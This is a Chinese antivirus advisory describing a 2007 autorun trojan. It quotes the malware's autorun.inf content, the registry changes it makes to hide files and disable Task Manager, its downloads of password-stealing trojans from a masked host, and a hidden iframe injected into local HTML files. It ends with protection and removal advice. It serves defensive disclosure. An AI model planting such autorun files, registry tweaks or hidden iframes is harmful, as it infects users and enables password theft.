天高云淡

危险等级：★★★
病毒名称：Trojan.DL.Win32.Autorun.yws
截获时间：2007-10-31
入库版本：19.47.21
类型：病毒

感染的操作系统： Windows XP, Windows NT, Windows Server 2003, Windows 2000

威胁情况：

传播级别：低

全球化传播态势：低

破坏力：低

清除难度：困难

破坏手段：下载运行恶意程序

此程序为Trojan类型程序

1、程序运行后将自身复制到%system32%目录下命名为Systom.exe，并添加注册表项实现开机自动运行，添加的注册表项如下：
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Crsss=“%system32%\Systom.exe”

2、将自身复制到磁盘分区根目录命名为sos.exe，并写入与之对应的autorun.inf。autorun.inf文件的内容如下：
[AuToRun]
open=sos.exe
shell\open=打开(&O)
shell\open\Command=sos.exe
shell\open\Default=1
shell\explore=资源治理器(&X)
shell\explore\Command=sos.exe
实现用户打开磁盘运行该病毒和传播的目的。

3、下载指定的文件并且运行。

要下载的文件有：http://www. rXXX.com/mm.txt，http://www. rXXX.com/ee.txt 等。这些文件为PSW类型的木马程序。

4、更改如下注册表项：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr= 00000001
HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced
Hidden = 00000000
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HideFileExt = 00000001
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ShowSuperHidden =00000000

实现了禁止任务治理器和不能显示病毒文件的功能。

5、修改本机的html文件,在文件尾添加如下HTML代码：

<IfrAmE src=http://www.rXXX.com/gm/sd.htm width=0 height=0></IfrAmE>

当用户浏览这些被感染的html文件时，会自动连接http://www.rXXX.com/gm/sd.htm。

安全建议：

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件天天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.47.21版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。